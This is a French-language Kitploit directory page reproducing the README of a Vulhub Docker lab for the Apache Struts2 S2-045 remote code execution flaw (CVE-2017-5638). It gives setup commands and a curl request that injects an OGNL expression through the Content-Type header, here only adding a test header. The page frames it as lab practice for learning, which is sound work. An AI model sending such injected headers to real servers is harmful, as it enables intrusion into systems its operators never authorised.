Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vulhub-struts2 — Un laboratoire pratique démontrant l'exploitation d'une vulnérabilité critique d'exécution de code à distance (RCE) dans Apache Struts2 (CVE-2017-5638) en utilisant les environnements Docker de Vulhub. Comprend des instructions d'installation et des commandes pour exécuter le conteneur vulnérable. | Kitploit
Outils/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Un laboratoire pratique démontrant l'exploitation d'une vulnérabilité critique d'exécution de code à distance (RCE) dans Apache Struts2 (CVE-2017-5638) en utilisant les environnements Docker de Vulhub. Comprend des instructions d'installation et des commandes pour exécuter le conteneur vulnérable.

Partager

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 Aperçu

Ce projet illustre la vulnérabilité d'exécution de code à distance (RCE) dans Apache Struts2 (CVE-2017-5638).

Les attaquants peuvent exploiter un en-tête HTTP Content-Type malveillant pour exécuter des commandes système arbitraires sur les serveurs vulnérables.

Ce dépôt utilise Vulhub Docker labs pour fournir un environnement sûr afin de tester et comprendre la vulnérabilité.


🛠 Configuration de l'environnement

  • Hôte : Ubuntu 24.04 (VirtualBox ou natif)
  • Docker et Docker Compose
  • Vulhub Lab
  • Version d'Apache Struts2 : 2.3.30

🚀 Pour commencer

1️⃣ Clonez ce dépôt

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ Démarrez le conteneur vulnérable

root@kitploit:~
docker compose up -d

3️⃣ Vérifiez que le conteneur est en cours d'exécution

root@kitploit:~
docker ps

Vous devriez voir quelque chose comme :

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ Testez l'interface web

Ouvrez votre navigateur → http://<VM_IP>:8080 Vous devriez voir la page d'accueil de l'application Struts2.

Exemple d'adresse IP de la VM : 192.168.56.101


💻 Exploitation

⚠️ Effectuez l'exploitation uniquement dans un environnement de laboratoire contrôlé. N'attaquez jamais des serveurs publics.

Vous pouvez maintenant tester la RCE à l'aide de scripts ou d'outils comme curl ou Metasploit contre le conteneur vulnérable.

Exemple (remplacez <command> par votre commande de test) :

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 Remarques

  • Ce laboratoire est sûr : toutes les actions se déroulent dans Docker.
  • Des captures d'écran de vos tests peuvent être ajoutées ultérieurement sur GitHub.
  • Vous pouvez étendre ce dépôt avec d'autres vulnérabilités Struts2 pour un portfolio d'apprentissage complet.

⚡ Références

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
Télécharger l’outil